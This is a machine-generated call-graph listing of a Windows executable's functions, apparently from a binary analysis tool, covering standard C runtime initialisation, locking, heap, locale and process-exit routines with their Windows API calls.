std::locale::_Setgloballocale 18132->18133 18134 1aa146 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18133->18134 18135 1aa191 std::locale::_Setgloballocale 18134->18135 18135->18066 18136 1b3f0a 18137 1b3d2e std::locale::_Setgloballocale 24 API calls 18136->18137 18138 1a97fa 18137->18138 18140 1a9890 18139->18140 18141 1ac8de 18140->18141 18158 1ad9b7 18141->18158 18144 1ac8e7 18144->18091 18146 1ac8ef 18147 1ac8fa 18146->18147 18172 1ad9f3 18146->18172 18147->18091 18212 1c1b35 18149->18212 18152 1ac8fd 18153 1ac910 18152->18153 18154 1ac906 18152->18154 18153->18092 18155 1aca76 ___vcrt_uninitialize_ptd 6 API calls 18154->18155 18156 1ac90b 18155->18156 18157 1ad9f3 ___vcrt_uninitialize_locks DeleteCriticalSection 18156->18157 18157->18153 18159 1ad9c0 18158->18159 18161 1ad9e9 18159->18161 18163 1ac8e3 18159->18163 18176 1adbfc 18159->18176 18162 1ad9f3 ___vcrt_uninitialize_locks DeleteCriticalSection 18161->18162 18162->18163 18163->18144 18164 1aca43 18163->18164 18193 1adb0d 18164->18193 18167 1aca58 18167->18146 18170 1aca73 18170->18146 18173 1ada1d 18172->18173 18174 1ad9fe 18172->18174 18173->18144 18175 1ada08 DeleteCriticalSection 18174->18175 18175->18173 18175->18175 18181 1ada22 18176->18181 18179 1adc34 InitializeCriticalSectionAndSpinCount 18180 1adc1f 18179->18180 18180->18159 18182 1ada43 18181->18182 18183 1ada3f 18181->18183 18182->18183 18184 1adaab GetProcAddress 18182->18184 18186 1ada9c 18182->18186 18188 1adac2 LoadLibraryExW 18182->18188 18183->18179 18183->18180 18184->18183 18186->18184 18187 1adaa4 FreeLibrary 18186->18187 18187->18184 18189 1adb09 18188->18189 18190 1adad9 GetLastError 18188->18190 18189->18182 18190->18189 18191 1adae4 ___vcrt_InitializeCriticalSectionEx 18190->18191 18191->18189 18192 1adafa LoadLibraryExW 18191->18192 18192->18182 18194 1ada22 ___vcrt_InitializeCriticalSectionEx 5 API calls 18193->18194 18195 1adb27 18194->18195 18196 1adb40 TlsAlloc 18195->18196 18197 1aca4d 18195->18197 18197->18167 18198 1adbbe 18197->18198 18199 1ada22 ___vcrt_InitializeCriticalSectionEx 5 API calls 18198->18199 18200 1adbd8 18199->18200 18201 1adbf3 TlsSetValue 18200->18201 18202 1aca66 18200->18202 18201->18202 18202->18170 18203 1aca76 18202->18203 18204 1aca86 18203->18204 18205 1aca80 18203->18205 18204->18167 18207 1adb48 18205->18207 18208 1ada22 ___vcrt_InitializeCriticalSectionEx 5 API calls 18207->18208 18209 1adb62 18208->18209 18210 1adb7a TlsFree 18209->18210 18211 1adb6e 18209->18211 18210->18211 18211->18204 18213 1c1b45 18212->18213 18214 1a98a2 18212->18214 18213->18214 18217 1b7bcb 18213->18217 18222 1b7c7b 18213->18222 18214->18095 18214->18152 18218 1b7bd2 18217->18218 18219 1b7c15 GetStdHandle 18218->18219 18220 1b7c77 18218->18220 18221 1b7c28 GetFileType 18218->18221 18219->18218 18220->18213 18221->18218 18223 1b7c87 ___scrt_is_nonwritable_in_current_image 18222->18223 18234 1aff95 EnterCriticalSection 18223->18234 18225 1b7c8e 18235 1bf5fc 18225->18235 18228 1b7cac 18254 1b7cd2 18228->18254 18233 1b7bcb 2 API calls 18233->18228 18234->18225 18236 1bf608 ___scrt_is_nonwritable_in_current_image 18235->18236 18237 1bf632 18236->18237 18238 1bf611 18236->18238 18257 1aff95 EnterCriticalSection 18237->18257 18265 1aff41 18238->18265 18244 1b7c9d 18244->18228 18248 1b7b15 GetStartupInfoW 18244->18248 18246 1bf66a 18271 1bf691 18246->18271 18247 1bf63e 18247->18246 18258 1bf54c 18247->18258 18249 1b7bc6 18248->18249 18250 1b7b32 18248->18250 18249->18233 18250->18249 18251 1bf5fc 45 API calls 18250->18251 18252 1b7b5a 18251->18252 18252->18249 18253 1b7b8a GetFileType 18252->18253 18253->18252 18465 1affdd LeaveCriticalSection 18254->18465 18256 1b7cbd 18256->18213 18257->18247 18274 1b6392 18258->18274 18260 1bf56b 18286 1b63ef 18260->18286 18262 1bf55e 18262->18260 18281 1b8ca9 18262->18281 18320 1b797b GetLastError 18265->18320 18267 1aff46 18268 1afe43 18267->18268 18384 1afd8f 18268->18384 18464 1affdd LeaveCriticalSection 18271->18464 18273 1bf698 18273->18244 18279 1b639f __Getctype 18274->18279 18275 1b63df 18278 1aff41 __strnicoll 13 API calls 18275->18278 18276 1b63ca RtlAllocateHeap 18277 1b63dd 18276->18277 18276->18279 18277->18262 18278->18277 18279->18275 18279->18276 18292 1b3362 18279->18292 18305 1b899c 18281->18305 18284 1b8ce3 InitializeCriticalSectionAndSpinCount 18285 1b8cce 18284->18285 18285->18262 18287 1b63fa HeapFree 18286->18287 18291 1b6424 18286->18291 18288 1b640f GetLastError 18287->18288 18287->18291 18289 1b641c __dosmaperr 18288->18289 18290 1aff41 __strnicoll 12 API calls 18289->18290 18290->18291 18291->18247 18295 1b338f 18292->18295 18296 1b339b ___scrt_is_nonwritable_in_current_image 18295->18296 18301 1aff95 EnterCriticalSection 18296->18301 18298 1b33a6 18302 1b33e2 18298->18302 18301->18298 18303 1affdd std::_Lockit::~_Lockit LeaveCriticalSection 18302->18303 18304 1b336d 18303->18304 18304->18279 18306 1b89ca 18305->18306 18311 1b89c6 18305->18311 18306->18311 18312 1b88d1 18306->18312 18309 1b89e4 GetProcAddress 18310 1b89f4 std::_Lockit::_Lockit 18309->18310 18309->18311 18310->18311 18311->18284 18311->18285 18317 1b88e2 ___vcrt_InitializeCriticalSectionEx 18312->18317 18313 1b8978 18313->18309 18313->18311 18314 1b8900 LoadLibraryExW 18315 1b891b GetLastError 18314->18315 18316 1b897f 18314->18316 18315->18317 18316->18313 18318 1b8991 FreeLibrary 18316->18318 18317->18313 18317->18314 18319 1b894e LoadLibraryExW 18317->18319 18318->18313 18319->18316 18319->18317 18321 1b7991 18320->18321 18324 1b7997 18320->18324 18343 1b8bad 18321->18343 18340 1b799b SetLastError 18324->18340 18348 1b8bec 18324->18348 18327 1b6392 __Getctype 12 API calls 18328 1b79c8 18327->18328 18329 1b79e1 18328->18329 18330 1b79d0 18328->18330 18332 1b8bec __Getctype 6 API calls 18329->18332 18331 1b8bec __Getctype 6 API calls 18330->18331 18333 1b79de 18331->18333 18334 1b79ed 18332->18334 18338 1b63ef ___free_lconv_mon 12 API calls 18333->18338 18335 1b7a08 18334->18335 18336 1b79f1 18334->18336 18353 1b7658 18335->18353 18337 1b8bec __Getctype 6 API calls 18336->18337 18337->18333 18338->18340 18340->18267 18344 1b899c std::_Lockit::_Lockit 5 API calls 18343->18344 18345 1b8bc9 18344->18345 18346 1b8bd2 18345->18346 18347 1b8be4 TlsGetValue 18345->18347 18346->18324 18349 1b899c std::_Lockit::_Lockit 5 API calls 18348->18349 18350 1b8c08 18349->18350 18351 1b79b3 18350->18351 18352 1b8c26 TlsSetValue 18350->18352 18351->18327 18351->18340 18358 1b74ec 18353->18358 18359 1b74f8 ___scrt_is_nonwritable_in_current_image 18358->18359 18372 1aff95 EnterCriticalSection 18359->18372 18361 1b7502 18373 1b7532 18361->18373 18364 1b75fe 18365 1b760a ___scrt_is_nonwritable_in_current_image 18364->18365 18376 1aff95 EnterCriticalSection 18365->18376 18367 1b7614 18377 1b77df 18367->18377 18369 1b762c 18372->18361 18374 1affdd std::_Lockit::~_Lockit LeaveCriticalSection 18373->18374 18375 1b7520 18374->18375 18375->18364 18376->18367 18378 1b7815 __Getctype 18377->18378 18379 1b77ee __Getctype 18377->18379 18378->18369 18379->18378 18380 1c053b __Getctype 14 API calls 18379->18380 18380->18378 18385 1afda1 _Fputc 18384->18385 18390 1afdc6 18385->18390 18391 1afdd6 18390->18391 18393 1afddd 18390->18393 18405 1aec30 GetLastError 18391->18405 18398 1afdb9 18393->18398 18409 1afc1e 18393->18409 18395 1afe12 18395->18398 18412 1afe70 IsProcessorFeaturePresent 18395->18412 18397 1afe42 18399 1aeab0 18398->18399 18400 1aeabc 18399->18400 18401 1aead3 18400->18401 18444 1aec80 18400->18444 18403 1aeae6 18401->18403 18404 1aec80 _Fputc 44 API calls 18401->18404 18403->18244 18404->18403 18406 1aec49 18405->18406 18416 1b7a2c 18406->18416 18410 1afc29 GetLastError SetLastError 18409->18410 18411 1afc42 18409->18411 18410->18395 18411->18395 18413 1afe7c 18412->18413 18438 1afc47 18413->18438 18417 1b7a3f 18416->18417 18418 1b7a45 18416->18418 18419 1b8bad __Getctype 6 API calls 18417->18419 18420 1b8bec __Getctype 6 API calls 18418->18420 18437 1aec65 SetLastError 18418->18437 18419->18418 18421 1b7a5f 18420->18421 18422 1b6392 __Getctype 14 API calls 18421->18422 18421->18437 18423 1b7a6f 18422->18423 18424 1b7a8c 18423->18424 18425 1b7a77 18423->18425 18427 1b8bec __Getctype 6 API calls 18424->18427 18426 1b8bec __Getctype 6 API calls 18425->18426 18435 1b7a83 18426->18435 18428 1b7a98 18427->18428 18429 1b7aab 18428->18429 18430 1b7a9c 18428->18430 18431 1b7658 __Getctype 14 API calls 18429->18431 18433 1b8bec __Getctype 6 API calls 18430->18433 18434 1b7ab6 18431->18434 18432 1b63ef ___free_lconv_mon 14 API calls 18432->18437 18433->18435 18436 1b63ef ___free_lconv_mon 14 API calls 18434->18436 18435->18432 18436->18437 18437->18393 18439 1afc63 codecvt std::locale::_Setgloballocale 18438->18439 18440 1afc8f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18439->18440 18441 1afd60 std::locale::_Setgloballocale 18440->18441 18442 1a9545 CatchGuardHandler 5 API calls 18441->18442 18443 1afd7e GetCurrentProcess TerminateProcess 18442->18443 18443->18397 18445 1aec8e GetLastError 18444->18445 18446 1aeccf 18444->18446 18447 1aec9d 18445->18447 18446->18401 18448 1b7a2c _Fputc 14 API calls 18447->18448 18449 1aecba SetLastError 18448->18449 18449->18446 18450 1aecd6 18449->18450 18453 1b2db9 18450->18453 18454 1bda8d std::locale::_Setgloballocale EnterCriticalSection LeaveCriticalSection 18453->18454 18455 1b2dbe 18454->18455 18456 1bdad2 std::locale::_Setgloballocale 43 API calls 18455->18456 18460 1b2dc9 18455->18460 18456->18460 18457 1b2dd3 IsProcessorFeaturePresent 18461 1b2ddf 18457->18461 18458 1b2df2 18459 1b3f0a std::locale::_Setgloballocale 24 API calls 18458->18459 18463 1aecdb 18459->18463 18460->18457 18460->18458 18462 1afc47 std::locale::_Setgloballocale 8 API calls 18461->18462 18462->18458 18464->18273 18465->18256 18467 1b38e7 18466->18467 18470 1b38fd 18466->18470 18467->18470 18472 1b390a 18467->18472 18469 1b38f4 18469->18470 18489 1b3a75 18469->18489 18470->18099 18473 1b3913 18472->18473 18474 1b3916 18472->18474 18473->18469 18497 1bedf1 18474->18497 18479 1b3933 18524 1b3964 18479->18524 18480 1b3927 18481 1b63ef ___free_lconv_mon 14 API calls 18480->18481 18484 1b392d 18481->18484 18484->18469 18485 1b63ef ___free_lconv_mon 14 API calls 18486 1b3957 18485->18486 18487 1b63ef ___free_lconv_mon 14 API calls 18486->18487 18488 1b395d 18487->18488 18488->18469 18490 1b3ae6 18489->18490 18495 1b3a84 18489->18495 18490->18470 18491 1b6392 __Getctype 14 API calls 18491->18495 18492 1b3aea 18494 1b63ef ___free_lconv_mon 14 API calls 18492->18494 18493 1bdd41 WideCharToMultiByte _Fputc 18493->18495 18494->18490 18495->18490 18495->18491 18495->18492 18495->18493 18496 1b63ef ___free_lconv_mon 14 API calls 18495->18496 18496->18495 18498 1bedfa 18497->18498 18499 1b391c 18497->18499 18546 1b78e5 18498->18546 18503 1bf0f3 GetEnvironmentStringsW 18499->18503 18504 1bf10b 18503->18504 18505 1b3921 18503->18505 18506 1bdd41 _Fputc WideCharToMultiByte 18504->18506 18505->18479 18505->18480 18507 1bf128 18506->18507 18508 1bf13d 18507->18508 18509 1bf132 FreeEnvironmentStringsW 18507->18509 18510 1b6429 __strnicoll 15 API calls 18508->18510 18509->18505 18511 1bf144 18510->18511 18512 1bf15d 18511->18512 18513 1bf14c 18511->18513 18515 1bdd41 _Fputc WideCharToMultiByte 18512->18515 18514 1b63ef ___free_lconv_mon 14 API calls 18513->18514 18516 1bf151 FreeEnvironmentStringsW 18514->18516 18517 1bf16d 18515->18517 18516->18505 18518 1bf17c 18517->18518 18519 1bf174 18517->18519 18521 1b63ef ___free_lconv_mon 14 API calls 18518->18521 18520 1b63ef ___free_lconv_mon 14 API calls 18519->18520 18522 1bf17a FreeEnvironmentStringsW 18520->18522 18521->18522 18522->18505 18525 1b3979 18524->18525 18526 1b6392 __Getctype 14 API calls 18525->18526 18527 1b39a0 18526->18527 18528 1b39a8 18527->18528 18537 1b39b2 18527->18537 18529 1b63ef ___free_lconv_mon 14 API calls 18528->18529 18545 1b393a 18529->18545 18530 1b3a0f 18531 1b63ef ___free_lconv_mon 14 API calls 18530->18531 18531->18545 18532 1b6392 __Getctype 14 API calls 18532->18537 18533 1b3a1e 18833 1b3a46 18533->18833 18537->18530 18537->18532 18537->18533 18539 1b3a39 18537->18539 18542 1b63ef ___free_lconv_mon 14 API calls 18537->18542 18824 1b5c3a 18537->18824 18538 1b63ef ___free_lconv_mon 14 API calls 18541 1b3a2b 18538->18541 18540 1afe70 __Getctype 11 API calls 18539->18540 18543 1b3a45 18540->18543 18544 1b63ef ___free_lconv_mon 14 API calls 18541->18544 18542->18537 18544->18545 18545->18485 18547 1b78f6 18546->18547 18548 1b78f0 18546->18548 18550 1b8bec __Getctype 6 API calls 18547->18550 18568 1b78fc 18547->18568 18549 1b8bad __Getctype 6 API calls 18548->18549 18549->18547 18551 1b7910 18550->18551 18552 1b6392 __Getctype 14 API calls 18551->18552 18551->18568 18554 1b7920 18552->18554 18553 1b2db9 CallUnexpected 44 API calls 18555 1b797a 18553->18555 18556 1b7928 18554->18556 18557 1b793d 18554->18557 18558 1b8bec __Getctype 6 API calls 18556->18558 18559 1b8bec __Getctype 6 API calls 18557->18559 18561 1b7934 18558->18561 18560 1b7949 18559->18560 18562 1b794d 18560->18562 18563 1b795c 18560->18563 18565 1b63ef ___free_lconv_mon 14 API calls 18561->18565 18566 1b8bec __Getctype 6 API calls 18562->18566 18564 1b7658 __Getctype 14 API calls 18563->18564 18567 1b7967 18564->18567 18565->18568 18566->18561 18569 1b63ef ___free_lconv_mon 14 API calls 18567->18569 18568->18553 18570 1b7901 18568->18570 18569->18570 18571 1bebfc 18570->18571 18594 1bed51 18571->18594 18578 1bec58 18580 1b63ef ___free_lconv_mon 14 API calls 18578->18580 18579 1bec66 18619 1bee4c 18579->18619 18582 1bec3f 18580->18582 18582->18499 18595 1bed5d ___scrt_is_nonwritable_in_current_image 18594->18595 18597 1bed77 18595->18597 18638 1aff95 EnterCriticalSection 18595->18638 18599 1bec26 18597->18599 18601 1b2db9 CallUnexpected 44 API calls 18597->18601 18598 1bedb3 18639 1bedd0 18598->18639 18605 1be97c 18599->18605 18603 1bedf0 18601->18603 18602 1bed87 18602->18598 18604 1b63ef ___free_lconv_mon 14 API calls 18602->18604 18604->18598 18643 1b2651 18605->18643 18608 1be9af 18610 1be9c6 18608->18610 18611 1be9b4 GetACP 18608->18611 18609 1be99d GetOEMCP 18609->18610 18610->18582 18612 1b6429 18610->18612 18611->18610 18613 1b6467 18612->18613 18617 1b6437 __Getctype 18612->18617 18614 1aff41 __strnicoll 14 API calls 18613->18614 18616 1b6465 18614->18616 18615 1b6452 RtlAllocateHeap 18615->18616 18615->18617 18616->18578 18616->18579 18617->18613 18617->18615 18618 1b3362 codecvt 2 API calls 18617->18618 18618->18617 18620 1be97c 46 API calls 18619->18620 18621 1bee6c 18620->18621 18623 1beea9 IsValidCodePage 18621->18623 18628 1beee5 codecvt 18621->18628 18625 1beebb 18623->18625 18623->18628 18624 1bec93 18626 1beeea GetCPInfo 18625->18626 18629 1beec4 codecvt 18625->18629 18626->18628 18626->18629 18723 1a9545 18628->18723 18712 1bea50 18629->18712 18638->18602 18642 1affdd LeaveCriticalSection 18639->18642 18641 1bedd7 18641->18597 18642->18641 18644 1b2668 18643->18644 18645 1b266f 18643->18645 18644->18608 18644->18609 18645->18644 18651 1b782a GetLastError 18645->18651 18652 1b7846 18651->18652 18653 1b7840 18651->18653 18655 1b8bec __Getctype 6 API calls 18652->18655 18657 1b784a SetLastError 18652->18657 18654 1b8bad __Getctype 6 API calls 18653->18654 18654->18652 18656 1b7862 18655->18656 18656->18657 18659 1b6392 __Getctype 14 API calls 18656->18659 18660 1b2690 18657->18660 18661 1b78df 18657->18661 18662 1b7877 18659->18662 18678 1b6477 18660->18678 18663 1b2db9 CallUnexpected 42 API calls 18661->18663 18664 1b787f 18662->18664 18665 1b7890 18662->18665 18668 1b78e4 18663->18668 18666 1b8bec __Getctype 6 API calls 18664->18666 18667 1b8bec __Getctype 6 API calls 18665->18667 18669 1b788d 18666->18669 18670 1b789c 18667->18670 18674 1b63ef ___free_lconv_mon 14 API calls 18669->18674 18671 1b78a0 18670->18671 18672 1b78b7 18670->18672 18673 1b8bec __Getctype 6 API calls 18671->18673 18675 1b7658 __Getctype 14 API calls 18672->18675 18673->18669 18674->18657 18676 1b78c2 18675->18676 18677 1b63ef ___free_lconv_mon 14 API calls 18676->18677 18677->18657 18679 1b26a6 18678->18679 18680 1b648a 18678->18680 18682 1b64d5 18679->18682 18680->18679 18686 1c0787 18680->18686 18683 1b64e8 18682->18683 18684 1b64fd 18682->18684 18683->18684 18707 1bee39 18683->18707 18684->18644 18687 1c0793 ___scrt_is_nonwritable_in_current_image 18686->18687 18688 1b782a __Getctype 44 API calls 18687->18688 18689 1c079c 18688->18689 18690 1c07e2 18689->18690 18699 1aff95 EnterCriticalSection 18689->18699 18690->18679 18692 1c07ba 18700 1c0808 18692->18700 18699->18692 18708 1b782a __Getctype 44 API calls 18707->18708 18709 1bee3e 18708->18709 18710 1bed51 __strnicoll 44 API calls 18709->18710 18711 1bee49 18710->18711 18711->18684 18724 1a954e IsProcessorFeaturePresent 18723->18724 18725 1a954d 18723->18725 18727 1a9d9d 18724->18727 18725->18624 18825 1b5c48 18824->18825 18827 1b5c56 18824->18827 18825->18827 18831 1b5c6e 18825->18831 18826 1aff41 __strnicoll 14 API calls 18828 1b5c5e 18826->18828 18827->18826 18829 1afe43 __strnicoll 44 API calls 18828->18829 18830 1b5c68 18829->18830 18830->18537 18831->18830 18832 1aff41 __strnicoll 14 API calls 18831->18832 18832->18828 18837 1b3a53 18833->18837 18838 1b3a24 18833->18838 18834 1b3a6a 18836 1b63ef ___free_lconv_mon 14 API calls 18834->18836 18835 1b63ef ___free_lconv_mon 14 API calls 18835->18837 18836->18838 18837->18834 18837->18835 18838->18538 18841 1a9558 18839->18841 18842 1a9572 18841->18842 18843 1b3362 codecvt 2 API calls 18841->18843 18844 1a9574 codecvt 18841->18844 18925 1b000b 18841->18925 18842->18103 18843->18841 18932 1aa3e0 18844->18932 18846 1a9f79 18848 1a4a42 18847->18848 18935 1a3a60 18848->18935 18850 1a4a91 18851 1a53d0 75 API calls 18850->18851 18862 1a4a97 18850->18862 18858 1a4aca std::ios_base::_Ios_base_dtor 18851->18858 18853 1a4c72 18854 1a2c4b 18853->18854 18956 1a4710 18853->18956 18863 1a53d0 18854->18863 18856 1a4b22 18857 1a4bc3 18856->18857 18861 1a49b0 73 API calls 18856->18861 18856->18862 18860 1a49b0 73 API calls 18857->18860 18857->18862 18858->18856 18951 1a49b0 18858->18951 18860->18857 18861->18856 18940 1a2130 18862->18940 19231 1a612a 18863->19231 18866 1a612a std::_Lockit::_Lockit 7 API calls 18867 1a541e 18866->18867 18869 1a6182 std::_Lockit::~_Lockit 2 API calls 18867->18869 18871 1a5442 18869->18871 18870 1a546d 18872 1a9545 CatchGuardHandler 5 API calls 18870->18872 18873 1a9553 codecvt 16 API calls 18871->18873 18905 1a5461 18871->18905 18874 1a2c6c 18872->18874 18875 1a54b3 18873->18875 18906 1a5cb0 18874->18906 18876 1a612a std::_Lockit::_Lockit 7 API calls 18875->18876 18877 1a54df 18876->18877 18878 1a5648 18877->18878 18879 1a5529 18877->18879 19282 1a62f1 18878->19282 19244 1a657d 18879->19244 19237 1a6182 18905->19237 18907 1a3a60 46 API calls 18906->18907 18930 1b6429 __Getctype 18925->18930 18926 1b6467 18927 1aff41 __strnicoll 14 API calls 18926->18927 18929 1b6465 18927->18929 18928 1b6452 RtlAllocateHeap 18928->18929 18928->18930 18929->18841 18930->18926 18930->18928 18931 1b3362 codecvt 2 API calls 18930->18931 18931->18930 18933 1aa427 RaiseException 18932->18933 18934 1aa3fa 18932->18934 18933->18846 18934->18933 18937 1a3a7c 18935->18937 18936 1a3a90 18936->18850 18937->18936 18938 1a4600 46 API calls 18937->18938 18939 1a3aaf 18938->18939 18939->18850 18941 1a214a 18940->18941 18942 1a2152 18940->18942 18943 1aa3e0 CallUnexpected RaiseException 18941->18943 18944 1a2162 std::ios_base::_Init 18941->18944 18942->18853 18943->18944 18960 1a2080 18944->18960 18952 1a49b8 18951->18952 18953 1a49c1 18952->18953 19071 1a71dc 18952->19071 18953->18858 18957 1a4773 18956->18957 18958 1a474e 18956->18958 18957->18854 18958->18957 19228 1a3ae0 18958->19228 18961 1a20c0 18960->18961 18961->18961 18977 1a50e0 18961->18977 18963 1a20d6 18985 1a14d0 18963->18985 18978 1a50f9 18977->18978 18979 1a5167 18977->18979 18982 1a5105 codecvt 18978->18982 19014 1a5e90 18978->19014 19028 1a13f0 18979->19028 18982->18963 18984 1a5142 codecvt 18984->18963 18986 1a1513 18985->18986 18987 1a1761 18986->18987 18990 1a1528 18986->18990 18988 1a13f0 std::ios_base::_Init 46 API calls 18987->18988 18989 1a1766 18988->18989 18991 1afe53 std::ios_base::_Init 44 API calls 18989->18991 18992 1a1535 codecvt 18990->18992 18993 1a5e90 std::ios_base::_Init 46 API calls 18990->18993 18994 1a176b 18991->18994 18999 1a15b0 18992->18999 19052 1a5270 18992->19052 18993->18992 18995 1afe53 std::ios_base::_Init 44 API calls 18994->18995 18996 1a1770 18995->18996 19001 1a5270 std::ios_base::_Init 46 API calls 18999->19001 19002 1a162a codecvt 18999->19002 19001->19002 19002->18989 19003 1a16a0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19002->19003 19004 1aa33b ___std_exception_copy 45 API calls 19003->19004 19005 1a16fc 19004->19005 19005->18994 19015 1a5e9b 19014->19015 19016 1a5ebd 19014->19016 19017 1a5ed2 19015->19017 19018 1a5ea2 19015->19018 19019 1a5ecd 19016->19019 19021 1a9553 codecvt 16 API calls 19016->19021 19033 1a1370 19017->19033 19020 1a9553 codecvt 16 API calls 19018->19020 19019->18984 19023 1a5ea8 19020->19023 19024 1a5ec7 19021->19024 19025 1a5eb1 19023->19025 19026 1afe53 std::ios_base::_Init 44 API calls 19023->19026 19024->18984 19025->18984 19027 1a5edc 19026->19027 19039 1a62b1 19028->19039 19034 1a137b codecvt 19033->19034 19035 1aa3e0 CallUnexpected RaiseException 19034->19035 19036 1a138a 19035->19036 19037 1aa33b ___std_exception_copy 45 API calls 19036->19037 19038 1a13b1 19037->19038 19038->19023 19044 1a61d4 19039->19044 19042 1aa3e0 CallUnexpected RaiseException 19043 1a62d0 19042->19043 19047 1a1270 19044->19047 19048 1aa33b ___std_exception_copy 45 API calls 19047->19048 19049 1a12a8 19048->19049 19050 1a9545 CatchGuardHandler 5 API calls 19049->19050 19051 1a12b9 19050->19051 19051->19042 19053 1a53c0 19052->19053 19054 1a5297 19052->19054 19056 1a13f0 std::ios_base::_Init 46 API calls 19053->19056 19055 1a52b0 19054->19055 19059 1a52f9 19054->19059 19061 1a5306 19054->19061 19060 1a9553 codecvt 16 API calls 19055->19060 19057 1a53c5 19056->19057 19058 1a1370 std::ios_base::_Init 46 API calls 19057->19058 19065 1a52c0 codecvt 19058->19065 19059->19055 19059->19057 19060->19065 19063 1a9553 codecvt 16 API calls 19061->19063 19061->19065 19062 1afe53 std::ios_base::_Init 44 API calls 19063->19065 19065->19062 19066 1a5379 codecvt std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19065->19066 19066->18999 19073 1a71fd 19071->19073 19075 1a7201 19071->19075 19072 1a9545 CatchGuardHandler 5 API calls 19074 1a49e4 19072->19074 19073->19072 19074->18858 19075->19073 19077 1a72b7 19075->19077 19078 1a7245 19075->19078 19077->19073 19083 1b178c 19077->19083 19078->19073 19080 1a66be 19078->19080 19089 1b0818 19080->19089 19084 1b179f _Fputc 19083->19084 19157 1b156b 19084->19157 19086 1b17b4 19087 1aeab0 _Fputc 44 API calls 19086->19087 19088 1b17c1 19087->19088 19088->19073 19090 1b082b _Fputc 19089->19090 19095 1b061c 19090->19095 19093 1aeab0 _Fputc 44 API calls 19094 1a66cc 19093->19094 19094->19073 19096 1b0628 ___scrt_is_nonwritable_in_current_image 19095->19096 19097 1b062f 19096->19097 19098 1b0654 19096->19098 19099 1afdc6 _Fputc 29 API calls 19097->19099 19106 1b040d EnterCriticalSection 19098->19106 19105 1b064a 19099->19105 19101 1b0663 19107 1b06e0 19101->19107 19105->19093 19106->19101 19108 1b0717 19107->19108 19128 1b0705 _Fputc 19107->19128 19132 1b738b 19108->19132 19112 1a9545 CatchGuardHandler 5 API calls 19114 1b0674 19112->19114 19129 1b06a4 19114->19129 19128->19112 19133 1b73ac 19132->19133 19134 1b7397 19132->19134 19158 1b1579 19157->19158 19163 1b15a1 19157->19163 19159 1b15a8 19158->19159 19160 1b1586 19158->19160 19158->19163 19165 1b14c4 19159->19165 19161 1afdc6 _Fputc 29 API calls 19160->19161 19161->19163 19163->19086 19166 1b14d0 ___scrt_is_nonwritable_in_current_image 19165->19166 19173 1b040d EnterCriticalSection 19166->19173 19168 1b14de 19174 1b151f 19168->19174 19173->19168 19184 1b7402 19174->19184 19204 1b73c7 19184->19204 19205 1b73d3 19204->19205 19229 1a2130 std::ios_base::_Init 46 API calls 19228->19229 19230 1a3aff 19229->19230 19230->18957 19232 1a6139 19231->19232 19233 1a6140 19231->19233 19287 1afff4 19232->19287 19235 1a5401 19233->19235 19292 1a9006 EnterCriticalSection 19233->19292 19235->18866 19235->18871 19238 1a618c 19237->19238 19239 1b0002 19237->19239 19241 1a619f 19238->19241 19344 1a9014 LeaveCriticalSection 19238->19344 19345 1affdd LeaveCriticalSection 19239->19345 19241->18870 19242 1b0009 19242->18870 19346 1b026b 19244->19346 19557 1a6248 19282->19557 19285 1aa3e0 CallUnexpected RaiseException 19293 1b8e04 19287->19293 19292->19235 19314 1b87b3 19293->19314 19315 1b899c std::_Lockit::_Lockit 5 API calls 19314->19315 19316 1b87c9 19315->19316 19317 1b87cd 19316->19317 19318 1b899c std::_Lockit::_Lockit 5 API calls 19317->19318 19319 1b87e3 19318->19319 19320 1b87e7 19319->19320 19321 1b899c std::_Lockit::_Lockit 5 API calls 19320->19321 19322 1b87fd 19321->19322 19344->19241 19345->19242 19347 1b8e04 std::_Lockit::_Lockit 5 API calls 19346->19347 19348 1b0278 19347->19348 19558 1a1270 std::invalid_argument::invalid_argument 45 API calls 19557->19558 19559 1a625a 19558->19559 19559->19285 19561 1b3d5b 19560->19561 19562 1b3d6d 19560->19562 19587 1b3df6 GetModuleHandleW 19561->19587 19572 1b3bf6 19562->19572 19566 1a97f2 19566->18136 19573 1b3c02 ___scrt_is_nonwritable_in_current_image 19572->19573 19595 1aff95 EnterCriticalSection 19573->19595 19575 1b3c0c 19596 1b3c43 19575->19596 19577 1b3c19 19600 1b3c37 19577->19600 19580 1b3dc5 19631 1b3e39 19580->19631 19583 1b3de3 19585 1b3e5b std::locale::_Setgloballocale 3 API calls 19583->19585 19584 1b3dd3 GetCurrentProcess TerminateProcess 19584->19583 19586 1b3deb ExitProcess 19585->19586 19588 1b3d60 19587->19588 19588->19562 19589 1b3e5b GetModuleHandleExW 19588->19589 19590 1b3ebb 19589->19590 19591 1b3e9a GetProcAddress 19589->19591 19592 1b3d6c 19590->19592 19593 1b3ec1 FreeLibrary 19590->19593 19591->19590 19594 1b3eae 19591->19594 19592->19562 19593->19592 19594->19590 19595->19575 19597 1b3c4f ___scrt_is_nonwritable_in_current_image 19596->19597 19598 1b3cb6 std::locale::_Setgloballocale 19597->19598 19603 1b59c8 19597->19603 19598->19577 19630 1affdd LeaveCriticalSection 19600->19630 19602 1b3c25 19602->19566 19602->19580 19604 1b59d4 __EH_prolog3 19603->19604 19607 1b5720 19604->19607 19606 1b59fb std::locale::_Init 19606->19598 19608 1b572c ___scrt_is_nonwritable_in_current_image 19607->19608 19615 1aff95 EnterCriticalSection 19608->19615 19610 1b573a 19616 1b58d8 19610->19616 19615->19610 19617 1b5747 19616->19617 19618 1b58f7 19616->19618 19622 1b576f 19617->19622 19618->19617 19619 1b5985 19618->19619 19625 1a9022 19618->19625 19619->19617 19620 1b63ef ___free_lconv_mon 14 API calls 19619->19620 19620->19617 19629 1affdd LeaveCriticalSection 19622->19629 19624 1b5758 19624->19606 19626 1a9062 19625->19626 19627 1a9047 RtlDecodePointer 19626->19627 19628 1a9077 19626->19628 19627->19626 19628->19618 19629->19624 19630->19602 19636 1bf51b GetPEB 19631->19636 19634 1b3dcf 19634->19583 19634->19584 19635 1b3e43 GetPEB 19635->19634 19637 1bf535 19636->19637 19639 1b3e3e 19636->19639 19640 1b8a1f 19637->19640 19639->19634 19639->19635 19641 1b899c std::_Lockit::_Lockit 5 API calls 19640->19641 19642 1b8a3b 19641->19642 19642->19639 19801 1a2660 19835 1a2200 19801->19835 19806 1a53d0 75 API calls 19807 1a26e9 19806->19807 19808 1a5cb0 75 API calls 19807->19808 19809 1a271d 19808->19809 19810 1a4600 46 API calls 